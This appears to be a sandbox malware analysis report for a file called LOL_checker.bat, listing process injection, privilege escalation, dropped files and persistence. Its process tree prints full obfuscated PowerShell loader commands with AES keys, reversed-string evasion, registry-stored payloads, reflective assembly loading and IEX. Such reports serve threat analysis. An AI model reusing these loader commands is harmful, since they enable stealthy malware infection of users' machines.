a0f43c5748ada07a12af81dda2460045030f936a8d5081f3a403f85c2a9668f8

Analysis

max time kernel
55s
max time network
99s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
02-05-2023 07:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LOL_checker.bat
Size

13.5MB
MD5

f7863fbcae244fa731b8b7d1e29bfb83
SHA1

44f01e8ad60e9f8c9830e256af0cab44796a0c06
SHA256

a0f43c5748ada07a12af81dda2460045030f936a8d5081f3a403f85c2a9668f8
SHA512

2f28b3d2d6bf51d0bac1aae84114bfcfc99218a0310c7ac95c8e34a04efe3f1fd37821b566483099e47ea693fa453290cfa82393bae48dfdfd933bbc34db0a8c
SSDEEP

49152:xn+XTjaklourM+8cnw+LP8HLTbQuUftwWx/njk4HI/GyIAGrtVtbsuhpcy8Jl5sl:O

Score

10^/10

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 1684 created 584	1684	LOL_checker.bat.exe	6
PID 5044 created 584	5044	$sxr-powershell.exe	6

Executes dropped EXE 4 IoCs

pid	Process
1684	LOL_checker.bat.exe
5044	$sxr-powershell.exe
4836	$sxr-powershell.exe
4060	$sxr-powershell.exe

Drops file in System32 directory 6 IoCs

description	ioc	Process
File created	C:\Windows\System32\ucrtbased.dll	LOL_checker.bat.exe
File created	C:\Windows\System32\vcruntime140_1d.dll	LOL_checker.bat.exe
File created	C:\Windows\System32\vcruntime140d.dll	LOL_checker.bat.exe
File opened for modification	C:\Windows\System32\ucrtbased.dll	LOL_checker.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140_1d.dll	LOL_checker.bat.exe
File opened for modification	C:\Windows\System32\vcruntime140d.dll	LOL_checker.bat.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1684 set thread context of 4788	1684	LOL_checker.bat.exe	86
PID 5044 set thread context of 4044	5044	$sxr-powershell.exe	88

Drops file in Windows directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\$sxr-powershell.exe	LOL_checker.bat.exe
File created	C:\Windows\$sxr-seroxen1\$sxr-nircmd.exe	LOL_checker.bat.exe
File created	C:\Windows\$sxr-seroxen1\$sxr-Uni.bat	LOL_checker.bat.exe
File created	C:\Windows\$sxr-powershell.exe	LOL_checker.bat.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
1684	LOL_checker.bat.exe
1684	LOL_checker.bat.exe
1684	LOL_checker.bat.exe
4788	dllhost.exe
4788	dllhost.exe
4788	dllhost.exe
4788	dllhost.exe
1684	LOL_checker.bat.exe
1684	LOL_checker.bat.exe
5044	$sxr-powershell.exe
5044	$sxr-powershell.exe
5044	$sxr-powershell.exe
4044	dllhost.exe
4044	dllhost.exe
4044	dllhost.exe
4044	dllhost.exe
5044	$sxr-powershell.exe
5044	$sxr-powershell.exe
4836	$sxr-powershell.exe
4060	$sxr-powershell.exe
4060	$sxr-powershell.exe
4836	$sxr-powershell.exe

Suspicious use of AdjustPrivilegeToken 8 IoCs

description	pid	Process
Token: SeDebugPrivilege	1684	LOL_checker.bat.exe
Token: SeDebugPrivilege	1684	LOL_checker.bat.exe
Token: SeDebugPrivilege	4788	dllhost.exe
Token: SeDebugPrivilege	5044	$sxr-powershell.exe
Token: SeDebugPrivilege	5044	$sxr-powershell.exe
Token: SeDebugPrivilege	4044	dllhost.exe
Token: SeDebugPrivilege	4836	$sxr-powershell.exe
Token: SeDebugPrivilege	4060	$sxr-powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 5072 wrote to memory of 1684	5072	cmd.exe	85
PID 5072 wrote to memory of 1684	5072	cmd.exe	85
PID 1684 wrote to memory of 4788	1684	LOL_checker.bat.exe	86
PID 1684 wrote to memory of 4788	1684	LOL_checker.bat.exe	86
PID 1684 wrote to memory of 4788	1684	LOL_checker.bat.exe	86
PID 1684 wrote to memory of 4788	1684	LOL_checker.bat.exe	86
PID 1684 wrote to memory of 4788	1684	LOL_checker.bat.exe	86
PID 1684 wrote to memory of 4788	1684	LOL_checker.bat.exe	86
PID 1684 wrote to memory of 4788	1684	LOL_checker.bat.exe	86
PID 1684 wrote to memory of 5044	1684	LOL_checker.bat.exe	87
PID 1684 wrote to memory of 5044	1684	LOL_checker.bat.exe	87
PID 5044 wrote to memory of 4044	5044	$sxr-powershell.exe	88
PID 5044 wrote to memory of 4044	5044	$sxr-powershell.exe	88
PID 5044 wrote to memory of 4044	5044	$sxr-powershell.exe	88
PID 5044 wrote to memory of 4044	5044	$sxr-powershell.exe	88
PID 5044 wrote to memory of 4044	5044	$sxr-powershell.exe	88
PID 5044 wrote to memory of 4044	5044	$sxr-powershell.exe	88
PID 5044 wrote to memory of 4044	5044	$sxr-powershell.exe	88
PID 5044 wrote to memory of 4836	5044	$sxr-powershell.exe	89
PID 5044 wrote to memory of 4836	5044	$sxr-powershell.exe	89
PID 5044 wrote to memory of 4060	5044	$sxr-powershell.exe	90
PID 5044 wrote to memory of 4060	5044	$sxr-powershell.exe	90

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:584
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{c3eedd2c-4f24-4cc9-a455-3caa27754859}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4788
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{7a7ba2f0-2434-4ab4-9069-5bb87b556ad4}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4044
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{a1cfc0f6-377d-48a3-9ac8-841db480ebff}
  2⤵
  PID:460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LOL_checker.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:5072
- C:\Users\Admin\AppData\Local\Temp\LOL_checker.bat.exe
  "LOL_checker.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function DQmdf($GcQSI){ $MLWPM=[System.Security.Cryptography.Aes]::Create(); $MLWPM.Mode=[System.Security.Cryptography.CipherMode]::CBC; $MLWPM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $MLWPM.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jnElpKi3YXgWFDU7pRsJ29FkGHhv7uNvwUu22mGWA88='); $MLWPM.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('AiYws6YSgygGmwuUkwYnTg=='); $vdfPb=$MLWPM.CreateDecryptor(); $return_var=$vdfPb.TransformFinalBlock($GcQSI, 0, $GcQSI.Length); $vdfPb.Dispose(); $MLWPM.Dispose(); $return_var;}function Jxcvo($GcQSI){ $ZkRsx=New-Object System.IO.MemoryStream(,$GcQSI); $isvCW=New-Object System.IO.MemoryStream; $xcnTt=New-Object System.IO.Compression.GZipStream($ZkRsx, [IO.Compression.CompressionMode]::Decompress); $xcnTt.CopyTo($isvCW); $xcnTt.Dispose(); $ZkRsx.Dispose(); $isvCW.Dispose(); $isvCW.ToArray();}function WwkcJ($GcQSI,$gLxyw){ $xyGVN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$GcQSI); $rMLKn=$xyGVN.EntryPoint; $rMLKn.Invoke($null, $gLxyw);}$rZFEd=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\LOL_checker.bat').Split([Environment]::NewLine);foreach ($crFGN in $rZFEd) { if ($crFGN.StartsWith(':: ')) { $kQmAw=$crFGN.Substring(3); break; }}$nzheQ=[string[]]$kQmAw.Split('\');$fCDTP=Jxcvo (DQmdf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($nzheQ[0])));$MFOxB=Jxcvo (DQmdf ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($nzheQ[1])));WwkcJ $MFOxB (,[string[]] (''));WwkcJ $fCDTP (,[string[]] (''));
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1684
- - C:\Windows\$sxr-powershell.exe
    "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command function zifef($NTrTH){ $aGcZU=[System.Security.Cryptography.Aes]::Create(); $aGcZU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aGcZU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aGcZU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs='); $aGcZU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw=='); $OxnSp=$aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')(); $uitwq=$OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NTrTH, 0, $NTrTH.Length); $OxnSp.Dispose(); $aGcZU.Dispose(); $uitwq;}function ySgoO($NTrTH){ $XJfLW=New-Object System.IO.MemoryStream(,$NTrTH); $PxpBO=New-Object System.IO.MemoryStream; $AxNsI=New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::Decompress); $AxNsI.CopyTo($PxpBO); $AxNsI.Dispose(); $XJfLW.Dispose(); $PxpBO.Dispose(); $PxpBO.ToArray();}function BjaNb($NTrTH,$ZmkKn){ $dNtdg=[System.Reflection.Assembly]::Load([byte[]]$NTrTH); $oGLPv=$dNtdg.EntryPoint; $oGLPv.Invoke($null, $ZmkKn);}$aGcZU1 = New-Object System.Security.Cryptography.AesManaged;$aGcZU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$ULxOr = $aGcZU1.('rotpyrceDetaerC'[-1..-15] -join '')();$bCesH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PokTvKiBA62m723YVszFJw==');$bCesH = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH, 0, $bCesH.Length);$bCesH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH);$IddYW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAS0STgq7AszID86mx7J1oxrPmrvSxE+D1WvhU8Riw4=');$IddYW = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IddYW, 0, $IddYW.Length);$IddYW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IddYW);$diZmt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JwGrsY4IwZtJyvmqThhjig==');$diZmt = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diZmt, 0, $diZmt.Length);$diZmt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diZmt);$YMmwc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IFBXh3VvnTbfkjzOzMuFAvprDf3UE19ASI2ku9w7JAUIKIL34rQdXdfLFKAdFu+sqvLOINzxaDRNhmJ3dTOPEvpl7+PrcdTbMnM2lqimXinccNVvk64uviqKLpZ/dK+YYNykBikjeqgXP+mpUruf00aBRSgpp2MVIfMPuOBLOvZc3ugGuV+p4iOvveSahdXCqWafxE4LQ+p6OnnPVRr50p4pLADVTOvhcOGxgWwgRLTMvhoYTMPWwsROqxW70/bNULyBTPO2xp9V/SV2H/j8HnD3sgxmv/My5DzaIRPWkoe7LIw1IWd76yUuAlAdtZ1j9gsoNG7b4zWdXbFK1Xfbassm+a8CWCtKvKhBZyyjph4jIqB61GtBtCSVOMgv/6bCgTGntOZKo3TvK+74rHwgRSPBX0RMwKmriHO+DoVnqjg=');$YMmwc = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YMmwc, 0, $YMmwc.Length);$YMmwc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YMmwc);$FQlxf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOIxGAtUwbQbaUcPWJh9+A==');$FQlxf = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FQlxf, 0, $FQlxf.Length);$FQlxf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FQlxf);$lIwaZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sw3zyc7XnjqyyLR4CzKLsA==');$lIwaZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lIwaZ, 0, $lIwaZ.Length);$lIwaZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lIwaZ);$cEGrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kaS1AVh70th6za2USmJkuw==');$cEGrZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEGrZ, 0, $cEGrZ.Length);$cEGrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cEGrZ);$SeaOI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s2ge8PIvH0oj/QSa8x2i8g==');$SeaOI = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SeaOI, 0, $SeaOI.Length);$SeaOI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SeaOI);$KQsXE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oes/OC49Qfs9K9BMGv1OUA==');$KQsXE = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KQsXE, 0, $KQsXE.Length);$KQsXE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KQsXE);$bCesH0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vf3Ryk5NtVjn+S1DAWh4QQ==');$bCesH0 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH0, 0, $bCesH0.Length);$bCesH0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH0);$bCesH1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JHeGXnm/IYKskOK73vkc3w==');$bCesH1 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH1, 0, $bCesH1.Length);$bCesH1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH1);$bCesH2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bQo3ozR5ByCMjq3cYV/XzQ==');$bCesH2 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH2, 0, $bCesH2.Length);$bCesH2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH2);$bCesH3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MfRxVSPnFiUv1PJp/MZjSw==');$bCesH3 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH3, 0, $bCesH3.Length);$bCesH3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH3);$ULxOr.Dispose();$aGcZU1.Dispose();$AjrNx = [Microsoft.Win32.Registry]::$SeaOI.$cEGrZ($bCesH).$lIwaZ($IddYW);$mjMnO=[string[]]$AjrNx.Split('\');$hfJNQ=ySgoO(zifef([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[1])));BjaNb $hfJNQ (,[string[]] ('%*'));$OyEtv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[0]);$aGcZU = New-Object System.Security.Cryptography.AesManaged;$aGcZU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$OxnSp = $aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')();$OyEtv = $OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OyEtv, 0, $OyEtv.Length);$OxnSp.Dispose();$aGcZU.Dispose();$XJfLW = New-Object System.IO.MemoryStream(, $OyEtv);$PxpBO = New-Object System.IO.MemoryStream;$AxNsI = New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::$bCesH1);$AxNsI.$KQsXE($PxpBO);$AxNsI.Dispose();$XJfLW.Dispose();$PxpBO.Dispose();$OyEtv = $PxpBO.ToArray();$qOsYa = $YMmwc | IEX;$dNtdg = $qOsYa::$bCesH2($OyEtv);$oGLPv = $dNtdg.EntryPoint;$oGLPv.$bCesH0($null, (, [string[]] ($diZmt)))
    3⤵
    - Suspicious use of NtCreateUserProcessOtherParentProcess
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:5044
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5044).WaitForExit();[System.Threading.Thread]::Sleep(5000); function zifef($NTrTH){ $aGcZU=[System.Security.Cryptography.Aes]::Create(); $aGcZU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aGcZU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aGcZU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs='); $aGcZU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw=='); $OxnSp=$aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')(); $uitwq=$OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NTrTH, 0, $NTrTH.Length); $OxnSp.Dispose(); $aGcZU.Dispose(); $uitwq;}function ySgoO($NTrTH){ $XJfLW=New-Object System.IO.MemoryStream(,$NTrTH); $PxpBO=New-Object System.IO.MemoryStream; $AxNsI=New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::Decompress); $AxNsI.CopyTo($PxpBO); $AxNsI.Dispose(); $XJfLW.Dispose(); $PxpBO.Dispose(); $PxpBO.ToArray();}function BjaNb($NTrTH,$ZmkKn){ $dNtdg=[System.Reflection.Assembly]::Load([byte[]]$NTrTH); $oGLPv=$dNtdg.EntryPoint; $oGLPv.Invoke($null, $ZmkKn);}$aGcZU1 = New-Object System.Security.Cryptography.AesManaged;$aGcZU1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$ULxOr = $aGcZU1.('rotpyrceDetaerC'[-1..-15] -join '')();$bCesH = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PokTvKiBA62m723YVszFJw==');$bCesH = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH, 0, $bCesH.Length);$bCesH = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH);$IddYW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('nAS0STgq7AszID86mx7J1oxrPmrvSxE+D1WvhU8Riw4=');$IddYW = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IddYW, 0, $IddYW.Length);$IddYW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IddYW);$diZmt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JwGrsY4IwZtJyvmqThhjig==');$diZmt = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($diZmt, 0, $diZmt.Length);$diZmt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($diZmt);$YMmwc = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IFBXh3VvnTbfkjzOzMuFAvprDf3UE19ASI2ku9w7JAUIKIL34rQdXdfLFKAdFu+sqvLOINzxaDRNhmJ3dTOPEvpl7+PrcdTbMnM2lqimXinccNVvk64uviqKLpZ/dK+YYNykBikjeqgXP+mpUruf00aBRSgpp2MVIfMPuOBLOvZc3ugGuV+p4iOvveSahdXCqWafxE4LQ+p6OnnPVRr50p4pLADVTOvhcOGxgWwgRLTMvhoYTMPWwsROqxW70/bNULyBTPO2xp9V/SV2H/j8HnD3sgxmv/My5DzaIRPWkoe7LIw1IWd76yUuAlAdtZ1j9gsoNG7b4zWdXbFK1Xfbassm+a8CWCtKvKhBZyyjph4jIqB61GtBtCSVOMgv/6bCgTGntOZKo3TvK+74rHwgRSPBX0RMwKmriHO+DoVnqjg=');$YMmwc = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($YMmwc, 0, $YMmwc.Length);$YMmwc = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($YMmwc);$FQlxf = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QOIxGAtUwbQbaUcPWJh9+A==');$FQlxf = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($FQlxf, 0, $FQlxf.Length);$FQlxf = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($FQlxf);$lIwaZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Sw3zyc7XnjqyyLR4CzKLsA==');$lIwaZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($lIwaZ, 0, $lIwaZ.Length);$lIwaZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($lIwaZ);$cEGrZ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kaS1AVh70th6za2USmJkuw==');$cEGrZ = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cEGrZ, 0, $cEGrZ.Length);$cEGrZ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cEGrZ);$SeaOI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('s2ge8PIvH0oj/QSa8x2i8g==');$SeaOI = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($SeaOI, 0, $SeaOI.Length);$SeaOI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($SeaOI);$KQsXE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oes/OC49Qfs9K9BMGv1OUA==');$KQsXE = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KQsXE, 0, $KQsXE.Length);$KQsXE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KQsXE);$bCesH0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Vf3Ryk5NtVjn+S1DAWh4QQ==');$bCesH0 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH0, 0, $bCesH0.Length);$bCesH0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH0);$bCesH1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('JHeGXnm/IYKskOK73vkc3w==');$bCesH1 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH1, 0, $bCesH1.Length);$bCesH1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH1);$bCesH2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bQo3ozR5ByCMjq3cYV/XzQ==');$bCesH2 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH2, 0, $bCesH2.Length);$bCesH2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH2);$bCesH3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MfRxVSPnFiUv1PJp/MZjSw==');$bCesH3 = $ULxOr.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($bCesH3, 0, $bCesH3.Length);$bCesH3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($bCesH3);$ULxOr.Dispose();$aGcZU1.Dispose();$AjrNx = [Microsoft.Win32.Registry]::$SeaOI.$cEGrZ($bCesH).$lIwaZ($IddYW);$mjMnO=[string[]]$AjrNx.Split('\');$hfJNQ=ySgoO(zifef([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[1])));BjaNb $hfJNQ (,[string[]] ('%*'));$OyEtv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($mjMnO[0]);$aGcZU = New-Object System.Security.Cryptography.AesManaged;$aGcZU.Mode = [System.Security.Cryptography.CipherMode]::CBC;$aGcZU.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$aGcZU.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs=');$aGcZU.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw==');$OxnSp = $aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')();$OyEtv = $OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($OyEtv, 0, $OyEtv.Length);$OxnSp.Dispose();$aGcZU.Dispose();$XJfLW = New-Object System.IO.MemoryStream(, $OyEtv);$PxpBO = New-Object System.IO.MemoryStream;$AxNsI = New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::$bCesH1);$AxNsI.$KQsXE($PxpBO);$AxNsI.Dispose();$XJfLW.Dispose();$PxpBO.Dispose();$OyEtv = $PxpBO.ToArray();$qOsYa = $YMmwc | IEX;$dNtdg = $qOsYa::$bCesH2($OyEtv);$oGLPv = $dNtdg.EntryPoint;$oGLPv.$bCesH0($null, (, [string[]] ($diZmt)))
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4836
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5044).WaitForExit();[System.Threading.Thread]::Sleep(5000); function zifef($NTrTH){ $aGcZU=[System.Security.Cryptography.Aes]::Create(); $aGcZU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aGcZU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aGcZU.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qD/Ha2bATeo37pbsMeBHw1cFRf9Ew7+eAWlhUx62QGs='); $aGcZU.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mQtoSA087IjDklxs9g2gLw=='); $OxnSp=$aGcZU.('rotpyrceDetaerC'[-1..-15] -join '')(); $uitwq=$OxnSp.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NTrTH, 0, $NTrTH.Length); $OxnSp.Dispose(); $aGcZU.Dispose(); $uitwq;}function ySgoO($NTrTH){ $XJfLW=New-Object System.IO.MemoryStream(,$NTrTH); $PxpBO=New-Object System.IO.MemoryStream; $AxNsI=New-Object System.IO.Compression.GZipStream($XJfLW, [IO.Compression.CompressionMode]::Decompress); 